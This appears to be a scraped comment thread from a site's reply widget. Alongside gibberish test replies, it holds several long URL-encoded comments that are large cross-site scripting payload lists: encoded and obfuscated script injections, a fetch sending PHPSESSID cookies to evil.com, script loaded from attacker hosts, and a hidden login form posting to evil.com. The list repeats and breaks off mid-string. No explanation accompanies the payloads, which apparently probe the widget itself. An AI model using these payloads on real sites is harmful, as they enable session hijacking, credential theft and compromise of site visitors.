Eugene Belford 2 Years Ago test Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago ikuklkllkj Reply Reply as... Cancel Kiko< Kikiki< Kiko Kikiki 3 Months Ago hhh Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago ikuklkllkj Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago ikuklkllkj Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago ikuklkllkjhhhh Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago chgc Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago ikuklkllkjhhhh Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago kjljh Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago hhhh>> Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago hhhh Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago n_vis%3Dxssx%27%2A%24.getScript%60%2F%2F593.xss.ht%60%2F%2F%3B%0A%5Bsize%3D%271337px%3B%5C%22%3E%3E%5C%3Cimg%2Fsrc%3Dccc%2F%20onerror%3Dalert%601%60%2F%2Fid%3Dname%20%2F%2F%26pt%3B%27%5Deviltext%5B%2Fsize%5D%0A%22%3E%3CBODy%20onbeforescriptexecute%3D%22x1%3D%27cookie%27%3Bc%3D%27%29%27%3Bb%3D%27a%27%3Blocation%3D%27jav%27%2Bb%2B%27script%3Acon%27%2B%27fir%5Cu006d%28%27%2B%27document%27%2B%27.%27%2Bx1%2Bc%22%3E%0A%3CinpuT%20autofocus%20oNFocus%3D%22setTimeout%28function%28%29%20%7B%20%2F%2A%5C%60%2A%2Ftop%5B%27al%27%2B%27%5Cu0065%27%2B%27rt%27%5D%28%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%5B%5D%2B%5B%5D%5D%5B%2B%5B%5D%5D%29%2F%2A%5C%60%2A%2F%20%7D%2C%205000%29%3B%22%3E%0A%3C%2FinpuT%253E%26lT%3B%2FstYle%26lT%3B%2FtitLe%26lT%3B%2FteXtarEa%26lT%3B%2FscRipt%26gT%3B%0A%22onmouseover%3D%22alert%281%29%0A%5C%22-alert%282%29%7D%2F%2F%0A%24%7Balert%283%29%7D%0A%22%3E%3Csvg%2Fonload%3Dprompt%28%27Supakiad-S.%20%28m3ez%29%27%2C%20document.domain%29%3E%0A%3CSvg%20Only%3D1%20Onload%3D%22window.location%3D%27https%3A%2F%2Fgoogle.com%27%2Bdocument.cookie%22%3E%0A%22%2F%3E%3Ca%20href%3D%22javascript%26colon%3Balert%26lp6ar%3B1%26rpar%3B%22%3Ex%3C%2Fa%3E%3Cdiv%20onmouseover%3D%27alert%261par%3B%27%3Ediv%3C%2Fdiv%3E%3C%21--%3Cvar%20onmouseover%3D%22prompt%282%29%22%3Eon%20mouse%20over%3C%2Fvar%3E%0A%22%3E%3Ca%20href%3D%22javascript%26colon%3Balert%26lp6ar%3B1%26rpar%3B%22%3Ex%3C%2Fa%3E%3Cdiv%20onmouseover%3D%27alert%261par%3B%27%3Ediv%3C%2Fdiv%3E%3C%21--%3Cvar%20onmouseover%3D%22prompt%282%29%22%3Eon%20mouse%20over%3C%2Fvar%3E%0A%3CSVG%2FoNIY%3D1%20ONLOAD%3Dconfirm%28document.domain%29%3E%0Ahttp%3A%2F%2Fexample.com%2522%2522%2C%257D%29%253C%2Fscript%253E%253Csvg%2Bonload%3Dconfirm%28location%29%253E%0A%22%3E%3C%2Fscript%3E%3Csvg%20onload%3D%2526%252397%253B%2526%2523108%253B%2526%2523101%253B%2526%2523114%253B%2526%2523116%253B%28document.domain%29%3E%0A%2526%2523%2578%2532%2532%253b%2526%2523%2578%2533%2565%253b%2526%2523%2578%2533%2563%253b%2526%2523%2578%2532%2566%253b%2526%2523%2578%2537%2533%253b%2526%2523%2578%2536%2533%253b%2526%2523%2578%2537%2532%253b%2526%2523%2578%2536%2539%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2534%253b%2526%2523%2578%2533%2565%253b%2526%2523%2578%2533%2563%253b%2526%2523%2578%2537%2533%253b%2526%2523%2578%2536%2533%253b%2526%2523%2578%2537%2532%253b%2526%2523%2578%2536%2539%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2534%253b%2526%2523%2578%2533%2565%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2532%253b%2526%2523%2578%2536%2566%253b%2526%2523%2578%2536%2564%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2534%253b%2526%2523%2578%2532%2538%253b%2526%2523%2578%2533%2534%253b%2526%2523%2578%2532%2539%253b%2526%2523%2578%2533%2563%253b%2526%2523%2578%2532%2566%253b%2526%2523%2578%2537%2533%253b%2526%2523%2578%2536%2533%253b%2526%2523%2578%2537%2532%253b%2526%2523%2578%2536%2539%253b%2526%2523%2578%2537%2530%253b%2526%2523%2578%2537%2534%253b%2526%2523%2578%2533%2565%253b%0A%2525%2532%2532%2525%2533%2565%2525%2533%2563%2525%2532%2566%2525%2537%2533%2525%2536%2533%2525%2537%2532%2525%2536%2539%2525%2537%2530%2525%2537%2534%2525%2533%2565%2525%2533%2563%2525%2537%2533%2525%2536%2533%2525%2537%2532%2525%2536%2539%2525%2537%2530%2525%2537%2534%2525%2533%2565%2525%2537%2530%2525%2537%2532%2525%2536%2566%2525%2536%2564%2525%2537%2530%2525%2537%2534%2525%2532%2538%2525%2533%2534%2525%2532%2539%2525%2533%2563%2525%2532%2566%2525%2537%2533%2525%2536%2533%2525%2537%2532%2525%2536%2539%2525%2537%2530%2525%2537%2534%2525%2533%2565%0A%3Cimg%20src%3D1%20onerror%3Dalert%28document.domain%29%3E%0A%3C%3E%3Cimg%20src%3D1%20onerror%3Dalert%283%29%3E%0A%7B%7B%24on.constructor%28%27alert%284%29%27%29%28%29%7D%7D%0Ajavascript%3Aalert%28document.cookie%29%0A%22%3E%3Csvg%3E%3Canimatetransform%20onbegin%3Dalert%285%29%3E%0A%27%3E%22%3E%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%2Fsrc%3Dattacker.com%2Fjs%3E%3C%2Fscript%3E%0A%3Fmsg%3D%3Cimg%2Fsrc%3D%60%2500%60%2520onerror%3Dthis.onerror%3Dconfirm%286%29%0A%26%2527%7D%2Cx%3Dx%3D%253E%7Bthrow%2F%2A%2A%2Fonerror%3Dalert%2C1337%7D%2CtoString%3Dx%2Cwindow%252b%2527%2527%2C%7Bx%3A%2527%0A%26toString%28%29.constructor.prototype.charAt%253d%5B%5D.join%3B%5B7%5D%7CorderBy%3AtoString%28%29.constructor.fromCharCode%28120%2C61%2C97%2C108%2C101%2C114%2C116%2C40%2C49%2C41%29%3D1%0A%3Csvg%2Fonload%3Deval%28atob%28%E2%80%98YWxlcnQoJ1hTUycp%E2%80%99%29%29%3E%0A%3Csvg%2Fonload%3Deval%28atob%28%E2%80%98YWxlcnQoZG9jdW1lbnQuY29va2llKQ%3D%3D%E2%80%99%29%29%3E%0Ahttp%3A%2F%2Ffoo%3F%26apos%3B-alert%288%29-%26apos%3B%0A%3C%2Ftextarea%3E%3CScRiPt%3Eprompt%28%2Fhack%20the%20planet%2F%29%3C%2FScRiPt%2F%2F%0A22%253E%253C%2Fscript%253E%253Csvg%2520onload%3D%2526%252397%253B%2526%2523108%253B%2526%2523101%253B%2526%2523114%253B%2526%2523116%253B%28document.domain%29%253E%0A%3Ciframe%20src%3D%22https%3A%2F%2FYOUR-LAB-ID.web-security-academy.net%2F%23%22%20onload%3D%22this.src%2B%3D%27%3Cimg%20src%3Dx%20onerror%3Dprint%28%29%3E%27%22%3E%3C%2Fiframe%3E%0A%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E%26token%3D%3Bscript-src-elem%2520%2527unsafe-inline%2527%0A%2522%253E%253C%2Fscript%253E%253Csvg%2520onload%3D%2526%252397%253B%2526%2523108%253B%2526%2523101%253B%2526%2523114%253B%2526%2523116%253B%28document.domain%29%253E%253C%2Ftextarea%253E%253CScRiPt%253Eprompt%28document.cookie%29%253C%2FScRiPt%2F%2F%0Adz7b%27-prompt%281%29-%27nrito%0A%3Cobject%20onerror%3Djavascript%3Ajavascript%3Aalert%281%29%3E%0A%3CXML%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG%20SRC%3D%22javas%5D%5D%3C%21%5BCDATA%5Bcript%3Ajavascript%3Aalert%282%29%3B%22%3E%5D%5D%3C%2FC%3E%3CX%3E%3C%2Fxml%3E%0A%3Ciframe%20srcdoc%3D%22%26LT%3Biframe%26sol%3Bsrcdoc%3D%26amp%3Blt%3Bimg%26sol%3Bsrc%3D%26amp%3Bapos%3B%26amp%3Bapos%3Bonerror%3Djavascript%3Aalert%28document.cookie%29%26amp%3Bgt%3B%3E%22%3E%20%0A%3Cimage%20src%3D1%20href%3D1%20onerror%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fimage%3E%0A%22%3E%3C%21%27%2F%2A%22%2A%5C%27%2F%2A%5C%22%2F%2A--%3E%3C%2FScript%3E%3CImage%20SrcSet%3DK%20%2A%2F%3B%20OnError%3Dconfirm%28document.domain%29%20%2F%2F%3E%23%0Ajavascript%253avar%7Ba%253aonerror%7D%253d%7Ba%253aalert%7D%253bthrow%252520document.cookie%0A%22%5C%2F%3E%3Cimg%2520s%2Bsrc%2Bc%3Dx%2520on%2Bonerror%2B%2520%3D%22alert%281%29%22%5C%3E%0A%3Cscript%3Ealert%28document.getElementsByTagName%28%27html%27%29%5B0%5D.innerHTML.match%28%2F%27%28%5B%5E%27%5D%252b%29%2F%29%5B1%5D%29%3C%2Fscript%3E%0A%3Cscript%3Ealert%28document.getElementsByTagName%28%27html%27%29%5B0%5D.innerHTML.match%28%2F%27%28%5B%5E%27%5D%252b%29%2F%29%5Bdocument.domain%5D%29%3C%2Fscript%3E%0Ajavascript%3Aalert%28document.domain%29%0A%3C%2FTextarea%2F%3C%2FNoscript%2F%3C%2FPre%2F%3C%2FXmp%3E%3CSvg%20%2FOnload%3Dconfirm%28document.domain%29%3E%0A%3Cscript%3Ealert%28document.head.innerHTML.substr%2877%2C%2097%2C%20120%29%29%3B%3C%2Fscript%3E%0A%3Ciframe%20srcdoc%3D%27%3Cbody%20onload%3Dprompt%26lpar%3B51%26rpar%3B%3E%27%3E%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0A%3Cobject%20onerror%3Djavascript%3Ajavascript%3Aalert%281%29%3E%0A%3CXML%20ID%3DI%3E%3CX%3E%3CC%3E%3C%21%5BCDATA%5B%3CIMG%20SRC%3D%22javas%5D%5D%3C%21%5BCDATA%5Bcript%3Ajavascript%3Aalert%282%29%3B%22%3E%5D%5D%3C%2FC%3E%3CX%3E%3C%2Fxml%3E%0A%3Ciframe%20srcdoc%3D%22%26LT%3Biframe%26sol%3Bsrcdoc%3D%26amp%3Blt%3Bimg%26sol%3Bsrc%3D%26amp%3Bapos%3B%26amp%3Bapos%3Bonerror%3Djavascript%3Aalert%28document.cookie%29%26amp%3Bgt%3B%3E%22%3E%0A%22%3E%3Cu%3EXSS%20Vulnerability%3C%2Fu%3E%3Cmarquee%2Bonstart%3D%27alert%28document.cookie%29%27%3EXSS%0A%20%3Cimg%20src%3D%22https%3A%2F%2Fbrutelogic.com.br%2Fpoc.svg%22%20width%3D%22500%22%20height%3D%22600%22%3E%0A%3Cimg%2Fsrc%2Foneror%3Dalert%28document%5B%27domain%5D%29%3E%0Ajavascript%3A%2F%2F%250aalert%281%29%0A%257B%257Bconstructor.constructor%28%2527alert%281337%29%2527%29%28%29%257D%257D%0A%E2%80%9C%3E%3CsVg%2FOnLuFy%3D%E2%80%9DX%3Dy%E2%80%9DoNloaD%3D%3B1%5Econfirm%281%29%3E%2F%60%60%C2%B9%2F%2F%0A%3Cscript%3E%7Bonerror%3Deval%7Dthrow%27%3Dalert%5Cx281337%5Cx29%27%3C%2Fscript%3E%0A%3Cscript%3Ethrow%20onerror%3Dalert%2C%27some%20string%27%2C123%2C%27haha%27%3C%2Fscript%3E%0A%3Cscript%3E%7Bonerror%3Deval%7Dthrow%7BlineNumber%3A1%2CcolumnNumber%3A1%2CfileName%3A1%2Cmessage%3A%27alert%5Cx281%5Cx29%27%7D%3C%2Fscript%3E%0A%3Cscript%3Ethrow%2Fa%2F%2CUncaught%3D1%2Cg%3Dalert%2Ca%3DURL%2B0%2Conerror%3Deval%2C%2F1%2Fg%2Ba%5B12%5D%2B%5B1337%5D%2Ba%5B13%5D%3C%2Fscript%3E%0A%3Cscript%3ETypeError.prototype.name%20%3D%27%3D%2F%27%2C0%5Bonerror%3Deval%5D%5B%27%2F-alert%281%29%2F%2F%27%5D%3C%2Fscript%3E%0A%22%3E%3CBODy%20onbeforescriptexecute%3D%22x1%3D%27cookie%27%3Bc%3D%27%29%27%3Bb%3D%27a%27%3Blocation%3D%27jav%27%2Bb%2B%27script%3Acon%27%2B%27fir%5Cu006d%28%27%2B%27document%27%2B%27.%27%2Bx1%2Bc%22%3E%0Axyz%22%2Fng-click%3D%22constructor.c%0AX-Forwarded-Host%3A%20bing.com%22%3E%3Cimg%20src%2Fonerror%3Dalert%284%29%3E%0A%253CA%2520HREF%253d%2522http%253a%252f%252fevil.com%2522%253EClick%2520Here%253C%252fA%253E%0A%3Cform%20action%3D%22%2F%2Fevil.com%22%20method%3D%22GET%22%3E%3Cinput%20type%3D%22text%22%20name%3D%22u%22%20style%3D%27opacity%3A0%3B%27%3E%3Cinput%20type%3D%22password%22%20name%3D%22p%22%20style%3D%27opacity%3A0%3B%27%3E%3Cinput%20type%3D%22submit%22%20name%3D%22s%22%20value%3D%22Load%20more%20content%22%3E%20%22%0A%3Ca%20href%3Dj%26%2397v%26%2397script%3A%26%2397lert%28document.cookie%29%3EClickMe%3C%2Fa%3E%0A%27%3C00%20foo%3D%22%3Ca%2520href%3D%22javascript%3Aalert%28%27XSS-Bypass%27%29%22%3EXSS-CLick%3C%2F00%3E--%2520%2F%0A%3Cmath%3E%3Cmtext%3E%3Ctable%3E%3Cmglyph%3E%3Cstyle%3E%3C%21%5BCDATA%5B%3C%2Fstyle%3E%3Cimg%20title%3D%22%5D%5D%26gt%3B%26lt%3B%2Fmglyph%26gt%3B%26lt%3Bimg%26Tab%3Bsrc%3D1%26Tab%3Bonerror%3Dalert%28%22Mr_Mian%22%29%26gt%3B%22%3E%0A%253Csvg%2520onload%3D%250Aalert%60xss-found%60%253E%0A%3Csvg%2Fonload%3D%5Cu0061lert%28String.fromC%5Cu0061rCode%2888%2C83%2C83%29%29%3E%0A%2B91%2097xxxx7x7%3Bphone-context%3D%26phone-%20context%3D%2B9739343777%0A%2B91%2097xxxx7x7%3Bext%3D1%3Bext%3D2%0A%2B91%2097xxxx7x7%3Bphone-context%3D%27%20OR%201%3D1%3B%20-%0A%2B91%2097xxxx7x7%3Bphone-context%3D%7B%7B4%2A4%7D%7D%7B%7B5%2B5%7D%7D%0A%2B91%2097xxxx7x7%3Bphone-context-burpcollaborator.net%0Athis%5BString.fromCharCode%2897%2C%20108%2C%20101%2C%20114%2C%20116%29%5D%28String.fromCharCode%2872%2C%20101%2C%20108%2C%20108%2C%20111%2C%2033%29%29%3B%0Athis%5B%22al%22%2B%22ert%22%5D%6000%60%20%0Athis%5B%27al%5Cx65rt%27%5D.bind%28this%29%28%27Hello%2C%20World%21%27%29%3B%20%0A%2B%5B%5D%5B%22fill%22%5D%5B%22constructor%22%5D%28%22alert%280%29%22%29%28%29%3B%0Athis%5B%27ale%5Cx72t%27%5D%280%2B0%29%3B%0Athis%5B%27al%27%20%2B%20%27ert%27%5D.call%28this%2C%200%20%2B%200%29%3B%0A%21function%28%29%7B%20this%5B%27al%5Cx65rt%27%5D%280%20%2B%200%29%3B%20%7D%28%29%3B%0A%2Bself%5B%2F%2Afoo%2A%2F%27alert%27%2F%2Abar%2A%2F%5D%28self%5B%2F%2Afoo%2A%2F%27document%27%2F%2Abar%2A%2F%5D%5B%27domain%27%5D%29%2F%2F%0A0..toLocaleString%5B%27constructor%27%5D%60alert%280%29%60%28%29%3B%0Afoo%22%3E%3CsvG%2FonLoAd%3Dconfirm%281337%29%3E%0A%3Cstyle%3E%3Cimg%20src%3D%22%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aalert%281%29%2F%2F%22%3E%0A%22%3E%5D%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E%0A%2B9739343777%3Bphone-context%3D%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0A%22%5Cu003e%5Cu003cimg%20src%3D1%20onerror%3Dalert%280%29%5Cu003e%0A%22%3E%3CSvg%20Only%3D1%20OnLoad%3Dconfirm%28atob%28%22Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ%3D%3D%22%29%29%3E%0A%3Cdetails%2Fopen%3D%2FOpen%2Fhref%3D%2Fdata%3D%2Bontoggle%3D%22%28alert%29%28document.domain%29%0A%E2%80%9C%3E%3Csv%5Cu01234%5Cg%5Cu01235%2Fon%5Cu01236load%3Dconfirm%281%29%3E%0A%22%3E%3Csv%5Cu01234%5Cg%2Bs%5C01235%5Cvg%2B%5C01236%5Csvg%0A%5Cu01237%5C%2F%20----%3E%20%5C%2F%5Cu01237%5C%2F%5C%20----%3E%20%2F%5Cu01237%5C%2F%20----%3E%20%2F%0AOn%5Cu01234%5Cload%20----%3E%20On%5Cu01234%5C%2BOnLoAd%20----%3E%20onload%0A%22%5C%2F%3E%3Cimg%2520s%2Bsrc%2Bc%3Dx%2520on%2Bonerror%2B%2520%3D%22alert%281%29%22%5C%3E%0AVR11%3Donfocus%3D%27%60%26VR12%3D%60%3Balert%2F%2A%26VR13%3D%2A%2F%281%29%27a%3D%27%26VR14%3D%27autofocus%0Ajavascript%3A%2561lert%281%29%0Ajavascript%3A%26%2337%26%2354%26%2349lert%281%29%0Ajavascript%3A%2526%252337%2526%252354%2526%252349lert%281%29%0A%22AutoFocus%2F%3E%2FOnFocus%3Dtop%3F.%5B%22ale%22%2B%22rt%22%5D%281%29%2F%22%0A%3Ca%2Fhref%3D%E2%80%9Dj%26Tab%3Ba%26Tab%3Bv%26Tab%3Basc%26Tab%3Bri%26Tab%3Bpt%3Aalert%26lpar%3B1%26rpar%3B%E2%80%9D%3E%0A%3Cs%5CCr%5Cipt%5C%3Ealert%28document%5C.cookie%29%3C%5C%2Fs%5CCr%5Cipt%5C%3E%5C%3B%5C%2F%3E%0A%3C%3C%2Fdiv%3Escript%3C%2Fdiv%3E%3Ealert%28%29%3C%3C%2Fdiv%3E%2Fscript%3C%2Fdiv%3E%3E%0A%3CSvg%20Only%3D1%20OnLoad%3Dconfirm%28atob%28%22Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ%3D%3D%22%29%29%3E%0A%3CJavaScript%3A%22%5C74Svg%5C57OnLoad%5C75%5C141%5C154%5C145%5C162%5C164%5C501%5C51%5C76%22%2FContentEditable%2FAutoFocus%2FOnFocus%3Dlocation%3DtagName%3E%0A%27%3Balert%28%228%22%29%250D%2F%2F%0Aonload%3D%22alert%28document.domain%29%0Akuromatae%22%3E%3Ctextarea%2Fonbeforeinput%3Dkuro%3D%26%23x27%3B%2F%2Fdomain.tld%26%23x27%3B%3Bimport%28kuro%29%2509autofocus%2509x%3E%0A%3CSvG%3E%3Cset%250Aonbegin%250A%3D%250aa%3Dconfirm%3Ba%2528%2560xss%2560%29%2Fx%3E%0A%3Csvg%3Cscript%3E%20onmou%3Cscript%3Eseover%3C%2Fscript%3E%3D%22alert%28%27xss%27%29%22%3Ehii%3C%2Fsvg%3C%2Fscript%3E%3E%0A%22%3E%3CHTML%20onmouSeovEr%3Dconfirm%28document.cookie%29x%3E%0A%3Ca%20style%3D%22position%3A%20fixed%3B%20top%3A%200%3B%20left%3A%200%3B%20z-index%3A%2099999%3B%20width%3A%20100%25%3B%20height%3A%20100%25%3B%22%20onmouseover%3Dalert%281%29%3E%0A%3Cscript%3Econst%20getCookieValue%3D%28name%29%3D%3E%28document.cookie.match%28%22%28%5E%7C%3B%29%5C%5Cs%2A%22%20%2B%20name%20%2B%20%22%5C%5Cs%2A%3D%5C%5Cs%2A%28%5B%5E%3B%5D%2B%29%22%29%3F.pop%28%29%20%7C%7C%20%22%22%29%3Bfetch%28%22http%3A%2F%2Fevil.com%3A1337%2Fdrop%3Fc%3D%22%20%2B%20getCookieValue%28%22PHPSESSID%22%29%29%3C%2Fscript%3E%0A%3C%3Cscript%3Escript%3Ealert%281%29%3C%3C%2Fscript%3E%2Fscript%3E%0A%3Csvg%3E%3Canimatetransform%20onbegin%3Dprint%28%29%3E%0A%2526%252302java%2526%2523115cript%3Aalert%28document.domain%29%0A%3CdETAILS%250aopen%250aonToGgle%250a%253d%250aa%253dprompt%2Ca%28origin%29%2520x%3E%0A%5Cu003cimg%5Cu0020src%5Cu003dx%5Cu0020onerror%5Cu003d%5Cu0022confirm%28document.domain%29%5Cu0022%5Cu003e%0AFUZZ%22%2527%22%3E%3Cxmp%3E%3Cp%2Btitle%253D%22%3C%252Fxmp%3E%3Cscript%3Ealert%28document.cookie%29%3C%252Fscript%3E%3E%0A%23%22%3E%3C%2Fdiv%3E%3Ca%20href%3D%20javascript%26colon%3Balert%26lpar%3Bdocument%26period%3Bdomain%29%0A%22onfocus%3D%22prompt%28document.cookie%29%22autofocus%3D%E2%80%9D%0AJorge%2BRodriguez-p3axusnf%3Cimg%2Fsrc%3D%7D%29%3Balert%28%29%0Adata-%27%3Balert%28%27XSS%20by%20Jorge%27%29%22%3E-%3Cimg%20src%20onerror%3D%22test%3D%E2%80%99%0A%3C%2Fbase%3C%2FsTyle%2F%3C%2FscRIpt%2F%3C%2FtextArea%2F%3C%2FnoScript%2F%3C%2FtiTle%2F--%3E%EF%BC%9Ch1%2F%3Ch1%3E%3Cimage%2Fonerror%3D%22import%28%27data%3Aapplication%2Fjavascript%3Bcharset%3Dutf-8%3Bbase64%2CYWxlcnQoZG9jdW1lbnQuZG9tYWluKTtjb25zb2xlLmxvZyhkb2N1bWVudC5kb21haW4pOy8v%27%29%2F%2F%2527%22src%3E%3Cscript%3E%0A%3Ca%20href%3Djavascript%3Aalert%288%29%3C%2Fa%3E%0A%5Cu0022%5Cu003c%2526quot%3B%2526gt%3B%2526lt%3B%22%27%3B%7D%7D%3B%E2%80%9C%3E%3C%2FSCRIPT%3E%3Cimg%20src%3Dx%20onerror%3Dalert%2869%29%3E%24%7B%7B7%2A7%7D%7D%0A%3Cp%3E%3C%2F%2F%2Fstyle%2F%2F%2F%3E%3Cspan%20%252F%20onmousemove%3D%27alert%26lpar%3B1%26rpar%3B%27%3E%3Cstrong%3EClick%20ME%3C%2Fstrong%3E%3C%2Fspan%3E%3C%2Fp%3E%0A%5C%22%3E%3Csvg%3E%3Canimate%20onbegin%3Dprompt%28document.cookie%29%20attributeName%3Dx%20dur%3D1s%3E%0A%2527%3B%7D%29%3Balert%28%2527Ramen%2527%29%3B%24%28picker%29.on%28%2527Noodles%2527%2C%2520function%28result%29%2520%7B%2520var%2520XSS%3D%2527%0A%3C%25s%25v%25g%2B%25on%25l%25oad%25%3Dc%25o%25nf%25i%25rm%25%281%25%29%3E%0Ajavascript%253avar%7Ba%253aonerror%7D%253d%7Ba%253aalert%7D%253bthrow%252520document.cookie%0A%5Cu003cimg%5Cu0020src%5Cu003dx%5Cu0020onerror%5Cu003d%5Cu0022confirm%28document.cookie%29%5Cu0022%5Cu003e%0A%26%2334%3B%26%2362%3B%3Ch1%2Fonmouseover%3D%E2%80%99%5Cu0061lert%281%29%E2%80%99%3E%0Ajavascript%3Aeval%28%27con%27%2B%27fi%27%2B%27rm%28doument.domain%29%27%29%0A%253c%2573%2576%2567%252f%256f%256e%256c%256f%2561%2564%253d%2570%2572%256f%256d%2570%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529%253e%0A%3Cbutton%20onclick%3D%22alert%281%29%22%3EClick%20me%2C%20please%3C%2Fbutton%3E%0A%3Ciframe%20srcdoc%3D%22%26lt%3Bscript%3Ealert%281%29%26lt%3B%2Fscript%3E%22%3E%3C%2Fiframe%3E%0A%3Ciframe%20src%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fiframe%3E%0A%26%23106avascript%26colon%3Bconfirm%281%29%0A%3Ca%20href%3D%22%26%23106avascript%26colon%3Balert%281%29%22%3Eclick%20me%3C%2Fa%3E%0Ajavascript%3A%2F%2Fhuli.tw%2F%250aalert%281%29%0Ajavascript%3Aalert%40github.com%2F%23%3A%2F%2F%0Ajavascript%3Aalert%2528%2527Slonser%2520was%2520here%2521%2527%2529%253B%252F%252F%40github.com%23%3Balert%2810%29%3B%3A%2F%2Feow5kas78d0wlv0.m.pipedream.net%2527%0AJaVaScRiP%250at%3Aalert%28document.domain%29%0A%3C%21--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E--%3E%0A%3Cdiv%3E%3Ciframe%20src%3Dhttps%3A%2F%2Fexample.com%3E%3C%2Fiframe%3E%3C%2Fdiv%3E%0A%3C%21--%20foo%3D%22bar--%3E%3Cs%3EHi%3C%2Fs%3E%22%20--%3E%0Ahttps%3A%2F%2Fassets.matters.news%2Fprocessed%2F1080w%2Fembed%2Ftest%20style%3Danimation-name%3Aspinning%20onanimationstart%3Dalert%281337%29%0A%3Cscript%20nonce%3Da2b5zsa19c%3Ealert%281%29%3C%2Fscript%3E%0A%3Cstyle%3E%3Ca%20id%3D%22%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E%22%3E%3C%2Fa%3E%3C%2Fstyle%3E%0A%3Csvg%3E%3C%2Fp%3E%3Cstyle%3E%3Ca%20id%3D%22%3C%2Fstyle%3E%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E%22%3E%0A%3Cdetails%2Fopen%3D%2FOpen%2Fhref%3D%2Fdata%3D%3B%20ontoggle%3D%22%28alert%29%28document.domain%29%0Axss%22%3E%3Cinput%2520type%3Dhidden%2520oncontentvisibilityautostatechange%3Dalert%3F.%2526lpar%3B%29%2520style%3Dcontent-visibility%3Aauto%3E%0A%0A%0A%0A%0A%0A%0A Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago n_vis=xssx'*$.getScript`//593.xss.ht`//; [size='1337px;\">>\ "/>x div# javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie "\/> javascript:alert(document.domain) Reply Reply as... Cancel Kiko Kikiki Eugene Belford 3 Months Ago hhhh>> Reply Reply as... Cancel
Kiko Kikiki Eugene Belford 3 Months Ago ikuklkllkj Reply Reply as... Cancel Kiko< Kikiki< Kiko Kikiki 3 Months Ago hhh Reply Reply as... Cancel
Kiko Kikiki Eugene Belford 3 Months Ago n_vis%3Dxssx%27%2A%24.getScript%60%2F%2F593.xss.ht%60%2F%2F%3B%0A%5Bsize%3D%271337px%3B%5C%22%3E%3E%5C%3Cimg%2Fsrc%3Dccc%2F%20onerror%3Dalert%601%60%2F%2Fid%3Dname%20%2F%2F%26pt%3B%27%5Deviltext%5B%2Fsize%5D%0A%22%3E%3CBODy%20onbeforescriptexecute%3D%22x1%3D%27cookie%27%3Bc%3D%27%29%27%3Bb%3D%27a%27%3Blocation%3D%27jav%27%2Bb%2B%27script%3Acon%27%2B%27fir%5Cu006d%28%27%2B%27document%27%2B%27.%27%2Bx1%2Bc%22%3E%0A%3CinpuT%20autofocus%20oNFocus%3D%22setTimeout%28function%28%29%20%7B%20%2F%2A%5C%60%2A%2Ftop%5B%27al%27%2B%27%5Cu0065%27%2B%27rt%27%5D%28%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%5B%21%5B%5D%2B%5B%5D%5D%5B%2B%5B%5D%5D%29%2F%2A%5C%60%2A%2F%20%7D%2C%205000%29%3B%22%3E%0A%3C%2FinpuT%253E%26lT%3B%2FstYle%26lT%3B%2FtitLe%26lT%3B%2FteXtarEa%26lT%3B%2FscRipt%26gT%3B%0A%22onmouseover%3D%22alert%281%29%0A%5C%22-alert%282%29%7D%2F%2F%0A%24%7Balert%283%29%7D%0A%22%3E%3Csvg%2Fonload%3Dprompt%28%27Supakiad-S.%20%28m3ez%29%27%2C%20document.domain%29%3E%0A%3CSvg%20Only%3D1%20Onload%3D%22window.location%3D%27https%3A%2F%2Fgoogle.com%27%2Bdocument.cookie%22%3E%0A%22%2F%3E%3Ca%20href%3D%22javascript%26colon%3Balert%26lp6ar%3B1%26rpar%3B%22%3Ex%3C%2Fa%3E%3Cdiv%20onmouseover%3D%27alert%261par%3B%27%3Ediv%3C%2Fdiv%3E%3C%21--%3Cvar%20onmouseover%3D%22prompt%282%29%22%3Eon%20mouse%20over%3C%2Fvar%3E%0A%22%3E%3Ca%20href%3D%22javascript%26colon%3Balert%26lp6ar%3B1%26rpar%3B%22%3Ex%3C%2Fa%3E%3Cdiv%20onmouseover%3D%27alert%261par%3B%27%3Ediv%3C%2Fdiv%3E%3C%21--%3Cvar%20onmouseover%3D%22prompt%282%29%22%3Eon%20mouse%20over%3C%2Fvar%3E%0A%3CSVG%2FoNIY%3D1%20ONLOAD%3Dconfirm%28document.domain%29%3E%0Ahttp%3A%2F%2Fexample.com%2522%2522%2C%257D%29%253C%2Fscript%253E%253Csvg%2Bonload%3Dconfirm%28location%29%253E%0A%22%3E%3C%2Fscript%3E%3Csvg%20onload%3D%2526%252397%253B%2526%2523108%253B%2526%2523101%253B%2526%2523114%253B%2526%2523116%253B%28document.domain%29%3E%0A%2526%2523